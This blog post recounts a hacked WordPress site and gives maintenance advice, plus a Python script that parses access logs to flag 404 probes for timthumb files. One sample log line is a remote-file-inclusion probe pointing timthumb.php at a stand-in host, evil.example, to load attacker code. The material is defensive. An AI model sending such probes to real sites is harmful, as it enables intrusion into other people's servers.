We discovered yesterday that one of our WordPress sites was hacked. We are pretty diligent about keeping our sites up-to-date and we do a complete update check once a month on all sites.
So what happened?
Basically, this is a good example of how pervasive and unrelenting the hackers are these days. The fact that technical people who follow the rules can still get hacked is a warning. Scary as that is, you can fight back. We are not completely sure whether this hacker used a currently common vulnerability or a new one. This site did not have the “timthumb.php” file, so that was not the entry point, but a bit of research did show that it is still a common target.
Some WordPress Basics For the Non-Technical
There are two quick tools you can use to monitor your site. The first is a plugin that scans your site for the “timthumb” vulnerability. The tool is here:
The next is a general site scanner that Sucuri provides as a free service:
I would definitely recommend both for any non-technical WordPress users. Lastly, and most importantly, keep your WordPress site up to date and clean it up by removing old themes and unused plugins. In our case, upgrading to the next version cleaned up the problem, along with getting rid of some old unused themes that seemed to be where this hacker targeted the site. It is easy to just deactivate a theme or plugin and leave it there, but a quick scan of our hosting logs revealed that most sites get probed constantly for vulnerable code. For example, this particular site was probed over 200 times this morning for files that don’t exist on it. You can’t stop this, but you can make it harder by keeping your site “lean and trim” and free of unused code in the form of themes and plugins.
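Here is the kind of log check described above, written as an added example for this post rather than taken from it: it parses Apache-style access log lines (constructed samples, using documentation-range IP addresses), counts 404s per client, and flags requests for the timthumb-style file names the post mentions as common probe targets.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2011:08:01:12 -0500] "GET /wp-content/themes/oldtheme/timthumb.php?src=http://evil.example/x.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2011:08:01:13 -0500] "GET /wp-content/themes/twentyten/thumb.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.22 - - [12/Dec/2011:08:02:40 -0500] "GET /index.php HTTP/1.1" 200 8920 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2011:08:03:01 -0500] "GET /wp-content/plugins/foo/timthumb.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.22 - - [12/Dec/2011:08:05:10 -0500] "GET /about/ HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
"""

# Client IP, request method/path, and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# File names the post singles out as frequent probe targets (assumed list).
PROBE_PATTERNS = re.compile(r"(timthumb|thumb)\.php$", re.IGNORECASE)


def summarize_probes(log_text):
    """Return (404 count per client IP, 404 count per path, flagged probe paths)."""
    by_ip, by_path, flagged = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the scan
        path = m.group("path").split("?", 1)[0]  # drop the query string
        if m.group("status") != "404":
            continue  # only requests for files that do not exist on the site
        by_ip[m.group("ip")] += 1
        by_path[path] += 1
        if PROBE_PATTERNS.search(path):
            flagged[path] += 1
    return by_ip, by_path, flagged


def noisy_clients(by_ip, threshold):
    """Clients whose 404 count exceeds the threshold, most active first."""
    return [ip for ip, n in by_ip.most_common() if n > threshold]


if __name__ == "__main__":
    ips, paths, probes = summarize_probes(SAMPLE_LOG)
    print("404s per client:", dict(ips))
    print("probe-style paths:", dict(probes))
    print("clients over threshold:", noisy_clients(ips, 2))
```

Point it at a real access log (for example by reading the file instead of SAMPLE_LOG) and raise the threshold to see which clients are doing the bulk of the probing.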
So, time for some winter cleaning and maintenance!